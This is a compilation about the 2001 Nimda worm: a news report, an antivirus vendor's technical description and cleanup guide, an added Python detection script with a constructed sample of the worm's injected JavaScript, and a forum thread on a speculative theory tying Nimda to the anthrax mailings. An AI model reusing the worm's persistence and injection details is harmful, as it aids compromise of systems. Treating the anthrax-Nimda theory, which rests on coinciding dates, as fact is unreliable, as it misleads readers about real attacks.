"No evidence" of terrorist link " Zdat so?
 

"Nimda" worm strikes Net, e-mail

Published: September 18, 2001, 5:20 PM PDT
By Robert Lemos
Staff Writer
 

A computer worm that spreads to both servers and PCs running Microsoft software flooded the Internet with data Tuesday, prompting the FBI to create a task force to investigate the attack, sources said.

Known as "Nimda" or "readme.exe," the worm spreads by sending infected e-mail messages, copying itself to computers on the same network, and compromising Web servers using Microsoft's Internet Information Server (IIS) software.

"It is extraordinary how much traffic this thing has created in a couple of hours," said Graham Cluley, senior security consultant for antivirus company Sophos. "As far as we can see, it doesn't seem to be using any psychological tricks because it's all automated."

Mailing lists for the security community quickly generated news of the worm, as infected servers scanned the Internet for vulnerable servers.

Sources in the antivirus community told CNET News.com that the FBI has set up a "task force" to study the virus. The FBI held conference calls three times Tuesday night with antivirus experts to discuss the investigation, sources said.

"There was a task force set up today, and there were a lot of things discussed," said Vincent Gullotto, director of antivirus research at security software firm Network Associates.

"No evidence" of terrorist link
An FBI representative said the agency was "assessing" the incident, but so far it found no relationship between the online deluge and last week's terrorist attacks on the World Trade Center and the Pentagon.

"There has been no indication that this is linked (to Tuesday's) attack," said FBI spokeswoman Debbie Weierman. "That is the question of the day."

At a news conference Tuesday about last week's terrorist attacks, Attorney General John Ashcroft also spoke about the Internet worm. "This could be heavier than the July activity with Code Red," he said.

He noted that there is "no evidence" linking the worm, which he said may have first appeared on Monday, "to the terrorist attacks of last week."

How the worm infects
The worm was noticed by several Silicon Valley companies.

"It does appear to be more aggressive than Code Red," said spokeswoman Pamela Sklar of network equipment maker 3Com. She added that the company's IT department received more hits per hour from Nimda than it did from Code Red, but that there was no direct effect on e-mail or Internet access.

The worm's name sparked speculation about its origin. Nimda, for example, is the backward spelling of admin, the common shorthand for the system administrator. While the worm has text indicating that it may have originated in China, that is in no way hard evidence, experts said.

Others pointed out that NIMDA is the name of an Israeli defense contractor.

The worm apparently generates an avalanche of Internet traffic because of its multipronged attack on both servers and PCs.

The server component of the virus exploits an old and previously patched flaw in IIS called the Unicode Directory Traversal vulnerability.

Once a server is infected, the worm continues to scan for other vulnerable computers. In addition, the program takes control of the part of Microsoft's IIS software that delivers Web pages, allowing the virus to trump a request for any page--even invalid requests--and instead return a page infected with the virus.

In addition to its ability to cross between servers and PCs, the Nimda worm seems to be more virulent because it automatically executes in Microsoft's Outlook e-mail software under the program's "low" security setting.

"There appears to be a MIME exploit," said Eric Chien, chief researcher for antivirus software maker Symantec's European operations. "It appears that it is doing some kind of exploitation in e-mail."

Nimda also appears to be capable of spreading by other means, including Internet relay chat (IRC), an online chat format, and by FTP for remotely exchanging files.

"My guess is we may also see it spread through Internet relay chat," said Alex Shipp, senior antivirus technologist at e-mail screening firm MessageLabs.

And that may not be the end of it. "We have also found an FTP component in there," Shipp said. "It may be trying to download nasty stuff from some Web site somewhere--we're still not sure. We know it is using FTP, but we don't know how yet."


MessageLabs said it stopped more than a hundred copies of the virus attached to e-mail messages within an hour of the first incident, which arrived from Korea at 12:10 p.m. GMT.

Most of the Nimda copies captured by MessageLabs originated from the United States, leading the company to speculate that was where the virus originated.

While thousands of people likely became aware of the worm when their in-boxes were flooded with e-mail, for some the damage was more severe.

Mel Lower of Davenport, Iowa, who hosts Web sites for small businesses through EarthLink, said two of his customers' sites were inaccessible for much of Tuesday.

Lower said he contacted EarthLink and was told that the worm "crippled" two Unix server farms. EarthLink could not immediately be reached for comment.

When Nimda arrives in an e-mail, it appears as an attachment named readme.exe. This is the same name used by another current virus called W32/Apost-A, so antivirus companies say many people should already be wary of attachments bearing that name.

However, analysis of the worm is ongoing, experts said.

"First of all, we are talking guesses at this time," said Fred Cohen from the University of New Haven in Connecticut. "Clearly, (it) just showed up this morning."

For some time Tuesday morning, the worm's double whammy had experts believing that two pieces of code were spreading at the same time.

The Computer Emergency Response Team

 Staff writer Matt Loney contributed from London.

 
 
 
F-Secure Virus Descriptions : Nimda





NAME: Nimda
ALIAS: W32/Nimda.A@mm
ALIAS: W32/Nimda@mm, I-Worm.Nimda, Readme, Readme.exe
SIZE: 57344

INFORMATION ON NIMDA

This worm was found on September 18th, 2001. It quickly spread around the world.

Also see http://www.F-Secure.com/news/2001/news_2001091900.shtml

F-Secure Anti-Virus detects the worm with updates released on September 18th, 2001 19:20 EET. Disinfection was added in the updates from September 19th, 2001 17:12 EET.

http://www.europe.f-secure.com/download-purchase/updates.shtml

For removal instructions, see the bottom of the page.

GENERAL INFORMATION

Nimda is a complex virus with a mass mailing worm component which spreads itself in attachments named README.EXE. It affects Windows 95, Windows 98, Windows Me, Windows NT 4 and Windows 2000 users.

Nimda is the first worm to modify existing web sites to start offering infected files for download. Also it is the first worm to use normal end user machines to scan for vulnerable web sites. This technique enables Nimda to easily reach intranet web sites located behind firewalls - something worms such as Code Red couldn't directly do.

Nimda uses the Unicode exploit to infect IIS web servers. This hole can be closed with a Microsoft patch, downloadable from: http://www.microsoft.com/technet/security/bulletin/ms00-078.asp

The MIME exploit used by the worm can be fixed with this patch: http://www.microsoft.com/technet/security/bulletin/MS01-020.asp

LIFECYCLE

The actual lifecycle of Nimda can be split into four parts: 1) Infecting files, 2) Mass mailing, 3) Web worm and 4) LAN propagation.

1) File infection

Nimda locates EXE files on the local machine and infects them by putting the file inside its body as a resource, thus 'assimilating' that file. These files then spread the infection when people exchange programs such as games.

2) Mass mailer

Nimda locates e-mail addresses via MAPI from your e-mail client as well as searching local HTML files for additional addresses. Then it sends one e-mail to each address. These mails contain an attachment called README.EXE, which might be executed automatically on some systems.

3) Web worm

Nimda starts to scan the internet, trying to locate www servers. Once a web server is found, the worm tries to infect it by using several known security holes. If this succeeds, the worm will modify random web pages on the site. The end result of this modification is that web surfers browsing the site will get automatically infected by the worm.

4) LAN propagation

The worm will search for file shares in the local network, either from file servers or from end user machines. Once found, it will drop a hidden file called RICHED20.DLL to any directory which has DOC and EML files. When other users try to open DOC or EML files from these directories, Word, Wordpad or Outlook will execute RICHED20.DLL causing an infection of the PC. The worm will also infect remote files if it was started on a server.

TECHNICAL DETAILS

First it should be noted that the worm behaves differently when started from files with different file names and with different command lines.

Starting on a server:

If the name of the worm's file is ADMIN.DLL, the worm creates a mutex named 'fsdhqherwqi2001', copies itself as MMC.EXE into the \Windows\ directory and starts that file with the '-qusery9bnow' command line. Usually the worm is started as ADMIN.DLL on infected webservers. In this case the worm starts to scan and infect files on all available drives, including removable and network ones. The EXE files (except WINZIP32.EXE) on these drives get infected with the worm. The infection technique the worm uses is new: the worm puts the original file inside its body as a resource. When the infected file is run, the worm extracts the embedded original EXE file, runs it and tries to delete it afterwards. If immediate deletion is not possible, the worm creates a WININIT.INI file that will delete the extracted file on the next Windows startup.

The worm also accesses the [SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths] key, reads the subkeys there and infects all files listed in those subkeys. The worm doesn't infect the WinZip32.exe file. The worm also reads the user's personal folders from the [Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders] key and infects files in these folders as well.

Then the worm starts to search local hard drives for *.HTML, .ASP, and .HTM files and if such files are found, the worm creates README.EML file (which is the multi-partite message with MIME-encoded worm) in the same directory and adds a small JavaScript code to the end of found files. That JavaScript code would open README.EML file when the infected HTML file is loaded by a web browser. As a result the MIME-encoded worm will get activated because of a security hole and a system will get infected.

The worm's file runs from a minimized window when downloaded from an infected webserver. This technique affects users who are browsing the web with Internet Explorer 5.0 or 5.01.

The worm will also put *.EML and *.NWS files in almost all folders of computers it accesses. The RICHED20.DLL file with hidden and system attribute will be put in all folders where DOC or EML files are located. The worm will also try to replace Windows' original RICHED20.DLL file with its own copy.

Starting on a workstation:

If the worm is started from a README.EXE file (or a file that has more than 5 characters in its name and an EXE extension), it copies itself to the temporary folder under a random name of the form 'MEP*.TMP' and runs itself from there with the '-dontrunold' command line option.

When started, the worm loads itself as a DLL library, looks for a specific resource there and checks its size. If the resource size is less than 100, the worm unloads itself; otherwise it extracts its resource to a file and launches it. The resource size check lets the worm detect whether it is running from an infected EXE file.

Then the worm gets current time and generates a random number. After performing a few arithmetic operations with this number the worm checks the result. If a result is bigger than worm's counter, the worm starts to search and delete README*.EXE files from temporary folder.

After that the worm prepares its MIME-encoded copy by extracting a pre-defined multi-partite MIME message from its body and appending its MIME-encoded copy to it. The file is created under a random name in the temporary folder.

The worm then looks for the EXPLORER process, opens it and injects itself as a remote thread of Explorer. On some platforms the worm fails to run as Explorer's thread. The worm then obtains the API addresses it needs, creates a mutex named 'fsdhqherwqi2001', starts up Winsock services, gets the infected computer's (host) info and sleeps for some time. When resumed, the worm checks what platform it is running on. If it is running on an NT-based system, it compacts its memory blocks to occupy less space in memory and copies itself as LOAD.EXE to the Windows system directory. Then it modifies the SYSTEM.INI file by adding the following string after the SHELL= variable in the [Boot] section:

  explorer.exe load.exe -dontrunold

This will start the worm's copy every time Windows starts. The worm also copies itself as RICHED20.DLL file to system folder and sets hidden and system attributes to this file as well as to LOAD.EXE file. Then the worm enumerates shared network resources and starts to recursively scan files on remote systems.

When searching for files on remote systems the worm looks for .DOC and .EML files and then copies its binary image with RICHED20.DLL name to the folders where DOC and EML files are located. The copied DLL file has system and hidden attributes. This is done to increase the chances of worm activation on remote systems as Windows' original RICHED20.DLL component is used to open OLE files. But instead the worm's RICHED20.DLL file from current directory will be launched.

Also, when the worm browses the remote computers' directories it creates .EML and (rarely) .NWS files that carry the names of document or webpage files the worm found on the remote system. These .EML and .NWS files are the worm's multi-partite messages with the worm MIME-encoded inside them. When scanning, the worm can also delete the .EML and .NWS files it previously created.

The worm doesn't try to infect local or remote EXE files when started from a workstation.

E-Mail spreading:

The worm searches through all the '.htm' and '.html' files in the Temporary Internet Files folder for e-mail addresses. It also reads through the user's inbox and collects the sender addresses. When the address list is ready it uses its own SMTP engine to send the infected messages.

IIS spreading:

The worm uses backdoors on IIS servers such as the one CodeRed II installs. It scans random IP addresses for these backdoors. When a host is found to have one, the worm instructs that machine to download the worm code (Admin.dll) from the host doing the scanning. It then executes the worm on the target machine, infecting it.

Affecting the security:

The worm adjusts Windows Explorer's settings: it accesses the [Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] key and changes the 'Hidden', 'ShowSuperHidden' and 'HideFileExt' values. This affects Windows' (especially ME and 2000) ability to show hidden files, so the worm's files will no longer be visible in Explorer.

After that the worm adds a 'guest' account to the infected system's account list, activates this account, adds it to the 'Administrator' and 'Guests' groups and shares the C:\ drive with full access privileges. The worm also deletes all subkeys from the [SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security] key to disable sharing security.

Additional information:

The worm has a copyright text string that is never displayed:

 Concept Virus(CV) V.5, Copyright(C)2001  R.P.China

It should be said that the worm has bugs that cause crashes or inability to spread itself in certain conditions.

DISINFECTION INSTRUCTIONS

F-Secure Anti-Virus with the latest updates can detect and disinfect Nimda infections. But full disinfection of the worm will require some additional manual actions.

The F-NIMDA tool was developed to automate these actions. If you wish to do them by hand, follow the instructions below. Otherwise, download F-NIMDA from

ftp://ftp.f-secure.com/anti-virus/tools/fsnimda3.exe

If you're running Windows ME, you need to turn off the Autorestore functionality before starting any disinfection. Do this by clicking My Computer on desktop, then Performance->File System ->Troubleshooting->Disable System Restore. Turn it back on when done.

To disinfect the worm and restore security of affected workstations, please follow these instructions:

1. Disable all network sharing or temporarily kill the network. This is a _must_ as the worm uses the network to spread itself.

2. Scan _all_ files (not just files with selected extensions) on all local hard drives and clean all infected EXE files using F-Secure Anti-Virus and the latest updates. It is recommended that you use one of the latest FSAV versions to remove infection.

3. Delete or rename (if not possible to delete instantly) all non-disinfectable or locked files including worm droppers (typically 57kB in size):

  MMC.EXE (in Windows directory)
  LOAD.EXE (in Windows' system directory)
  ADMIN.DLL (in root folder of all local hard drives)
  RICHED20.DLL (in all folders on all local hard drives)

  All *.EML and *.NWS files (typically 79kB in size) that are detected as infected with Nimda should be deleted. Note that you might have clean EML files as well, for example if you've saved e-mails to file from Outlook Express, so only delete files that FSAV detects as infected.

If an infected file is locked by Windows, complete the disinfection, then exit to pure DOS or boot your system with a clean system diskette and rename/delete the file manually. On NT/2000-based systems the locked file(s) should be renamed with a non-executable extension to ensure they don't start when Windows is booted next time.

4. Restart the system. Do not connect it to the network yet. It is advised to scan all files on all local drives with FSAV again to ensure that there are no more infected files on the system.

5. Locate SYSTEM.INI file in your Windows directory and open it with Wordpad or Notepad. Replace the string "shell=explorer.exe load.exe -donotloadold" with "shell=explorer.exe" string.

6. Delete all files with .TMP extensions from your local temporary directories - typically \Temp\ or \Windows\Temp\ or \documents and settings\username\local settings\temp.

7. Copy a clean RICHED20.DLL file to \Windows\System\ or \WinNT\System32\ folders. This DLL file is used by many applications and they won't run if this DLL is missing. You can locate a clean RICHED20.DLL file from a clean Windows machine, or extract it from Office 2000 CD with this command:

   EXTRACT /A r:\office1.cab riched20.dll /L c:\windows\system

8. Remove all shares from all local hard drives and renew these shares with correct access rights if needed. This needs to be done because the worm affects shares security. Check especially the \\localhost\c$ share rights.

9. Remove 'Guest' account and renew it with correct access rights and group placement ('Guest' account should not be in 'Administrators' group).

10. Check all *.HTML, *.ASP, and *.HTM as well as files that have 'DEFAULT', 'INDEX', 'MAIN' and 'README' words in their filenames for the small JavaScript code referring to README.EML file and remove it or restore the affected files from a backup. This JavaScript code is located in the very end of affected files.

11. When cleaning a webserver from Nimda, the CodeRed II backdoor infections should be removed as well. Please refer to 'CodeRed' description and cleaning instructions.

http://www.europe.f-secure.com/v-descs/bady.shtml

12. Correct Windows Explorer's settings for displaying hidden files and certain extensions if necessary, as the worm makes Explorer hide certain files and extensions.

13. Restore network connections only after all workstations are disinfected, or the worm will re-infect already clean computers!

ABOUT INFECTED WEB SITES

A web site can get infected in two ways:

1) Infected HTML files are copied to the secure site. This can happen even if you're using a patched version of IIS or something else entirely (such as Apache or Netscape). If there are infected computers in your organization, their local HTML files get infected. Users might then later copy or upload such infected pages to your www server. Alternatively, if your www files are accessible via file sharing, the worm might infect them directly from a workstation. To clean your site, locate all HTML pages which refer to "README.EML" and remove the extra JavaScript code from the end of the pages.

2) Direct web worm infection. If your web site is running an unsafe version of IIS, the worm can infect your site by accessing it through http. After this it will restart spreading from your server. In this case it is not enough to just clean the virus: your web server is unsafe and has been so for a while. It's likely there have been previous illegitimate accesses to your site as well, and it should be considered compromised. We recommend rebuilding the web server and applying the latest patches before restoring clean copies of the HTML pages.
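The persistence entry in SYSTEM.INI, the RICHED20.DLL drop beside DOC/EML files and the JavaScript appended to web pages described in the technical details, together with cleanup steps 5 and 10 above, can be checked with a short script. The following is an added example and not F-Secure's F-NIMDA tool; the SYSTEM.INI text, the directory layout and the exact script tail it matches are constructed samples based on the description, not captured worm artifacts.

```python
"""Nimda host-indicator checks and cleanup helpers: an added example, not
F-Secure's F-NIMDA tool. Every sample below is constructed so it runs offline."""
import os
import re
import tempfile
from pathlib import Path

SHELL_RE = re.compile(r"^\s*shell\s*=\s*(.*?)\s*$", re.IGNORECASE)
# The description says the worm appends "a small JavaScript code" that opens
# README.EML at the very end of .HTM/.HTML/.ASP files; this pattern and the
# APPENDED_SCRIPT sample below are a constructed stand-in with that shape.
NIMDA_SCRIPT_RE = re.compile(
    r"(?:<html>\s*)?<script[^>]*>[^<]*readme\.eml[^<]*</script>(?:\s*</html>)?\s*$",
    re.IGNORECASE)
DOC_EXTS = {".doc", ".eml"}
WEB_EXTS = {".htm", ".html", ".asp"}

SAMPLE_SYSTEM_INI = ("[boot]\n"
                     "shell=explorer.exe load.exe -dontrunold\n"
                     "[386Enh]\n"
                     "device=*vmm\n")
CLEAN_PAGE = "<html><body><h1>Welcome</h1></body></html>\n"
APPENDED_SCRIPT = ('<html><script language="JavaScript">'
                   'window.open("readme.eml", null, "resizable=no,top=6000,left=6000")'
                   "</script></html>\n")

def _boot_shell_lines(text):
    """Yield (line, is_worm_shell) for each SYSTEM.INI line; the worm's entry is
    the [boot] shell= value that launches load.exe (the page spells the switch
    two ways, so only the executable name is matched)."""
    in_boot = False
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("[") and stripped.endswith("]"):
            in_boot = stripped.lower() == "[boot]"
            yield line, False
            continue
        m = SHELL_RE.match(line)
        yield line, bool(in_boot and m and "load.exe" in m.group(1).lower())

def system_ini_shell_is_modified(text):
    return any(flag for _line, flag in _boot_shell_lines(text))

def clean_system_ini_shell(text):
    """Step 5 of the cleanup: restore the shell= line to plain explorer.exe."""
    out = ["shell=explorer.exe" if flag else line
           for line, flag in _boot_shell_lines(text)]
    return "\n".join(out) + "\n"

def find_dropped_riched20(root):
    """RICHED20.DLL beside .DOC/.EML files matches the LAN-propagation drop:
    Word, Wordpad and Outlook pick up the copy in the document's own folder."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        has_docs = any(Path(f).suffix.lower() in DOC_EXTS for f in files)
        hits += [Path(dirpath) / f for f in files
                 if has_docs and f.lower() == "riched20.dll"]
    return hits

def find_infected_web_pages(root):
    """Pages whose tail is the README.EML-opening script (cleanup step 10)."""
    return [p for p in Path(root).rglob("*")
            if p.is_file() and p.suffix.lower() in WEB_EXTS
            and NIMDA_SCRIPT_RE.search(p.read_text(errors="replace"))]

def strip_nimda_script(html):
    """Remove the appended script so the page no longer pushes README.EML."""
    return NIMDA_SCRIPT_RE.sub("", html)

def build_sample_tree(base):
    """Constructed layout: a share with documents plus the dropped DLL, a system
    folder where RICHED20.DLL belongs, and a web root with one modified page."""
    (base / "share").mkdir()
    (base / "share" / "budget.doc").write_bytes(b"constructed document")
    (base / "share" / "RICHED20.DLL").write_bytes(b"MZ constructed dropper")
    (base / "system32").mkdir()
    (base / "system32" / "RICHED20.DLL").write_bytes(b"MZ legitimate copy")
    (base / "wwwroot").mkdir()
    (base / "wwwroot" / "index.html").write_text(CLEAN_PAGE + APPENDED_SCRIPT)
    (base / "wwwroot" / "about.htm").write_text(CLEAN_PAGE)
    return base

def run_checks(root, system_ini_text):
    rel = lambda p: p.relative_to(root).as_posix()
    return {
        "system_ini_modified": system_ini_shell_is_modified(system_ini_text),
        "dropped_riched20": sorted(rel(p) for p in find_dropped_riched20(root)),
        "infected_pages": sorted(rel(p) for p in find_infected_web_pages(root)),
    }

def demo_results():
    """Build the sample tree in a temporary directory and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return run_checks(build_sample_tree(Path(tmp)), SAMPLE_SYSTEM_INI)

if __name__ == "__main__":
    print(demo_results())
```

On a real machine the system32 copy of RICHED20.DLL is the legitimate one only if it matches a known-good copy (step 7), which this script does not verify.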

Remember, F-Secure Management Server 4.x uses IIS as a web server platform. Keep them patched. F-Secure Policy Manager Server 5.0 and higher do NOT use IIS.

IMPORTANT NOTE

Around 15:00 GMT on 11th of October, 2001, hundreds of e-mails infected with Nimda.A were sent to various addresses around the world. These e-mails looked like they were sent by "mikko.hypponen@datafellows.com" (do note that F-Secure used to be called datafellows.com; the company name and domain were changed in early 2000). Mr. Mikko Hypponen is our Manager of Anti-Virus Research. He naturally had nothing to do with this incident. These e-mails were apparently sent from an infected machine located somewhere in Canada.

F-SECURE ANTI-VIRUS

F-Secure Anti-Virus detects the worm with updates released on September 18th, 2001 19:20 EET. Disinfection was added in the updates from September 19th, 2001 17:12 EET.

http://www.europe.f-secure.com/download-purchase/updates.shtml

[Analysis: K. Tocheva, G. Erdelyi, A. Podrezov, S. Rautiainen and M. Hypponen; F-Secure Corp.; September 18-19th, 2001]

 
 
 

Possible break in the anthrax case? (Actual title: Anthrax-Nimda Connection)
Dept. of Computer Science and Software Engineering, Seattle University ^ | November 9, 2001 | M. Spector

Posted on 11/13/2001 12:42:52 PM PST by Mitchell

ANTHRAX-NIMDA CONNECTION

Two Prongs of One Attack on Our Communication System

M. Spector
Dept. of Computer Science and Software Engineering
Seattle University
E-mail: spector@seattleu.edu

November 9, 2001

It appears likely that the recent anthrax mailings and the Nimda computer worm are two prongs of a single coordinated attack on our communications infrastructure. If this theory is correct, there may be two undiscovered anthrax-laden letters, including one mailed in late October whose victims would still be in the incubation period.

A Summary of the Evidence

The anthrax mailings and the Nimda worm were released on exactly the same two dates. Moreover, they were distributed via essentially the same method, and they shared a common apparent purpose. The details follow.

Released on the Same Dates
The anthrax-laden letters were postmarked on Sept. 18 and Oct. 9, 2001. These are precisely the same dates that the destructive Nimda worm and a new variant of this worm called Nimda.B were released on the Internet. Sept. 18 was the date that the Nimda worm was released on the Internet, and Oct. 9 was the date that the Nimda.B variant was released.

Same Method
Both involve mailing (either by the Postal Service or by e-mail) a destructive payload to unsuspecting individuals. Although the two attacks (anthrax and Nimda) appear at first glance to be very different from one another, a similar mind-set seems to underlie both.

Same Apparent Purpose
Both attacks may have had as their combined purpose the simultaneous disruption of all our mail communications -- both the U.S. mail and e-mail. Luckily, neither attack has been particularly successful in this regard, at least so far.

In addition, the anthrax letters were sent to people in the mass media, which is another component of our communications system.

Consequences

Still-Undiscovered Anthrax Mailings? (Kathy Nguyen's Death and Another Possible Forthcoming Attack)
Three more variants of the Nimda worm were released after Nimda.B: Nimda.C (on October 12), and Nimda.D and Nimda.E (both on October 29). If the anthrax-Nimda connection isn't a coincidence, there may have been further mailings of anthrax on October 12 and October 29.

Are there undiscovered anthrax letters that were mailed on the later worm release dates of October 12 and October 29? Is it conceivable that a hypothetical October 12 mailing was responsible for Kathy Nguyen's death? I think anybody infected by a hypothetical October 29 mailing would still be in the incubation period for the disease, with signs of infection to show up shortly.

I hope I'm wrong about the possibility of an Oct. 29 anthrax mailing, but it's important to be alert for more anthrax cases as we near the end of what would be the incubation period (and this is also a test of whether the theory is correct).

Notice that these hypothetical anthrax release dates are consistent with the warnings of terrorist attacks within the following few days issued by the FBI on Oct. 11 and by Attorney General John Ashcroft on Oct. 31 (especially in light of both the incubation period for anthrax and the inherent uncertainty in warnings such as these).

Connection with Code Red II and earlier worms
The Nimda worm makes use of "back-doors" left by the earlier Code Red II and sadmind worms. It is unknown if this is an opportunistic use of these back-doors, or if one or both of these earlier worms were released with the specific intent of following up with the Nimda worm. It is also unknown if Code Red II is actually related to the original Code Red worm (in spite of the names assigned by security experts). In any event, the sadmind worm was released on May 8, 2001, Code Red was released on July 16, 2001, and Code Red II was released on August 4, 2001. It would be of interest to see if there were any apparently unrelated anthrax threats, terrorist threats, etc., on May 8, July 16, and/or August 4. (I have seen a news report indicating that Bill O'Reilly and Sean Hannity of Fox News may have received letters before Sept. 11 apparently similar to the later anthrax mailings.)

The People Behind the Attack
The coincidence of dates and the similarity of methods and purpose indicate that the same group of people is behind both the anthrax attacks and the Nimda series of worms. It appears that at least two people must be involved, since one person is unlikely to be so skilled at both microbiology and software development as to have been able to create and carry out both attacks.

Speculation

Speculation - Connections with the 9/11 attacks
The first Nimda attack occurred almost precisely one week (to the hour, and maybe to the minute) after the first plane hit the World Trade Center, strongly suggesting a connection between the Sept. 11 attacks and Nimda, and now therefore suggesting a connection between the Sept. 11 attacks and the anthrax mailings.

Speculation - Place of Origin
This theory may point to a foreign connection with the anthrax attack. It has been widely suggested that Nimda may have originated in China; this is purely speculative and is based only on early widespread propagation in Asia and on the fact the worm itself contains a reference to China.

Background: Technical Information on the Nimda Worm (and others)

For technical information on the Nimda, Code Red, Code Red II, and sadmind worms, see the Symantec security web site at http://securityresponse.symantec.com , the F-Secure web site at http://www.europe.f-secure.com/v-descs/w.shtml (click on W32/Nimda.a@mm, etc.), and the SANS Institute web site at http://www.incidents.org .



1 posted on 11/13/2001 12:42:52 PM PST by Mitchell

To: Mitchell
I only skimmed, but this is pretty fascinating. I'll be interested to see other comments.
2 posted on 11/13/2001 12:48:37 PM PST by NYS_Eric

To: Mitchell; *tech_index; *Anthrax_Scare_List
Very interesting !

To find all articles tagged or indexed using above index words

Go here:

OFFICIAL BUMP(TOPIC)LIST

and then click the topic to initiate the search! !

3 posted on 11/13/2001 12:48:51 PM PST by Ernest_at_the_Beach

To: Mitchell; *tech_index
Filing at tech_index
4 posted on 11/13/2001 12:52:21 PM PST by afraidfortherepublic

To: Mitchell
Bumpin' to check later.

Initial impression - it seems rather far-fetched, but, then again, that's an impressive set of 'coincidences'.

5 posted on 11/13/2001 12:57:55 PM PST by Le-Roy

To: Mitchell
Now THIS is getting really far fetched ....

Sorry, but the "evidence" is not only weak, it is outright MISSING! try again...

6 posted on 11/13/2001 1:00:37 PM PST by AgThorn

To: Mitchell
Speculation - Connections with the 9/11 attacks.

Ahhh.... He admits this is speculation.
7 posted on 11/13/2001 1:32:57 PM PST by self_evident

To: AgThorn
>Sorry, but the "evidence" is not only weak, it is outright MISSING! try again...

"Evidence?"

If the sequence of events as speculated about turns out to be true, what kind of evidence would be available?!

Would you dismiss a connection as unreal until an FBI agent just happens to walk into a two bedroom apartment where, in one bedroom, a guy is mixing up anthrax and in the other a guy is typing up computer code?

I mean, this is 2001. People doing this kind of terrorism aren't idiots. This weird, constant talk of "evidence" has an air of insanity to it.

More likely than not, there will NEVER be evidence that will stand up in a court of law EXPLAINING everything nice and tidy. But so what? Law enforcement or intelligent agencies still have to respond sooner rather than later to this kind of large scale threats. They have to act on something other than "court room evidence." And if we're going to understand what's going on around us, we have to recognize that although "evidence" is great and although it's dangerous to speculate without hard, material evidence, there are many situations where people just have to get creative, people have to trust their judgement, and people have to deal with conclusions based on them being persuasively true rather than true beyond a shadow of a doubt.

Reality is not a court room. It's just not. There is a kind of insanity in trying to deny all of reality that doesn't meet those utterly artificial standards.

Mark W.

8 posted on 11/13/2001 1:46:38 PM PST by MarkWar

To: MarkWar
What is the connection? the same date? that's it? That's pretty weak.
9 posted on 11/13/2001 1:54:37 PM PST by AgThorn

To: AgThorn
Two identical dates, plus similarity of method and purpose. How much more evidence could there be at this stage? It merits further investigation.

By the way, the CDC now thinks there is an undiscovered letter, mailed before Oct. 24. This could be the hypothesized Oct. 12 letter in the article. http://www.freerepublic.com/focus/fr/570240/posts

10 posted on 11/13/2001 2:01:19 PM PST by Mitchell

To: AgThorn
Sorry, but the "evidence" is not only weak, it is outright MISSING

This guy is so far out of his tree that it's pitiful. You see this phenomenon every time something happens on the malware front: a zillion wannabes popping up with one theory more bizarre than the next. Simply put, he's wrong. And if he had bothered to contact any of the people who know about this stuff, he would know that he was wrong. That would probably not have deterred him from trying for some spotlight, though.

The author of Nimda is out there giving interviews and shouting for fame. Much like this dweeb.

11 posted on 11/13/2001 2:07:32 PM PST by Cachelot

To: Mitchell; AgThorn
Sorry for the extra URL at the end (a copy-and-paste error). It's the same as the CDC link at the beginning of that paragraph.
12 posted on 11/13/2001 2:11:11 PM PST by Mitchell

To: Cachelot
The author of Nimda is out there giving interviews and shouting for fame.

Interviews? Can you give a source for this? I've seen nothing on it.

13 posted on 11/13/2001 2:12:58 PM PST by Mitchell

To: Mitchell
Two identical dates, plus similarity of method and purpose. How much more evidence could there be at this stage? It merits further investigation.
similarity of method, i.e. meaning they are both "mail" (snail and "e") ... Yes, and ???? Does that mean that anyone that ever drove a truck has something in common with anyone else that drove a truck? especially if they did it on the same day? ... these "connections" are weaker than weak!!

Purpose?-That's redundant to "method" ... i.e. if your purpose is to get information channels blocked, you would in effect use the information channel to do the blocking. No, this is a great model for conspiracy chasers only.

Date- I have already stated that the ONLY thing going here is the similarity of dates ... but what is that? nothing.

SANTA and SATAN have the same letters, just rearranged ... heck that's got as much "conspiracy" grounding in it as this does.

14 posted on 11/13/2001 3:17:46 PM PST by AgThorn

To: AgThorn
SANTA and SATAN have the same letters, just rearranged...

This explains some of the Christmas presents I've gotten lately....
15 posted on 11/13/2001 3:31:46 PM PST by self_evident

To: self_evident
I can relate!! ;-)
16 posted on 11/13/2001 5:29:22 PM PST by AgThorn

To: AgThorn
Silly speculation is fodder for mockery --except for the speculation that turns out to be true.

Who would have thought that there were Japanese spying all over numerous countries in the late 30's and early 40's, collaborating with Nazis to boot --including a certain chap who lived for awhile in Pearl Harbor and liked to watch the ships move in and out of port?

17 posted on 11/13/2001 10:35:38 PM PST by unspun

To: unspun
Silly speculation is fodder for mockery --except for the speculation that turns out to be true.
You got a point there. Santa could after all be Satan, and remember, you read it here first!
18 posted on 11/13/2001 10:39:05 PM PST by AgThorn

To: AgThorn
Well, I'm not interested in getting into an argument over this. I find the coincidences intriguing, you don't; that's OK.

Unlike the run-of-the-mill conspiracy theory, this one has testable conclusions; it's falsifiable. If it's correct, there ought to have been anthrax mailings postmarked very close to Oct. 12 and Oct. 29. (Even if such mailings turn up, I would agree that that's not definitive proof. If no such mailings turn up, however, that would be a strong argument against the theory.)

By the way, the similarity of method is much more than the fact that both used mail. Both involve using mail to send unrelated destructive payloads to unsuspecting people. (This may still not be enough to satisfy your standards for a connection, but it is more of a connection than your characterization suggests.)

Also, the similarity of purpose isn't the same as that of method. People have suggested lots of other possible rationales behind the anthrax attack (a warning from Iraq, for instance, or bin Laden aiming at the media to elicit maximum hysteria as he tries to goad us into an attack on all of the Muslim world, or possibly a test of how a biological agent would spread in the mail, or other possibilities). If this connection is true, it suggests a particular specific purpose, namely trying to disrupt or even shut down our mail and other communication systems.

Anyway, since the theory has testable conclusions, I thought it would be of interest to get it out there now, rather than after any further mailings are discovered (since at that time, people might say that the theory was tailored to fit the facts). Time will tell if it is true or false.

19 posted on 11/16/2001 1:06:33 PM PST by Mitchell

To: Mitchell
Time will tell if it is true or false.

I concede that for certain. I still see stronger "ties" to Afghanistan/Iraq possible collusion in this than to any Nimda connection. Then again, who's to say that Nimda doesn't have Middle-east ties as well.

There is just too little even circumstantial evidence to make any other correlation at this time. Although we can always speculate ...

20 posted on 11/16/2001 1:07:08 PM PST by AgThorn

Comment #21 Removed by Moderator

To: AgThorn
I still see stronger "ties" to Afghanistan/Iraq possible collusion in this than to any Nimda connection. Then again, who's to say that Nimda doesn't have Middle-east ties as well.

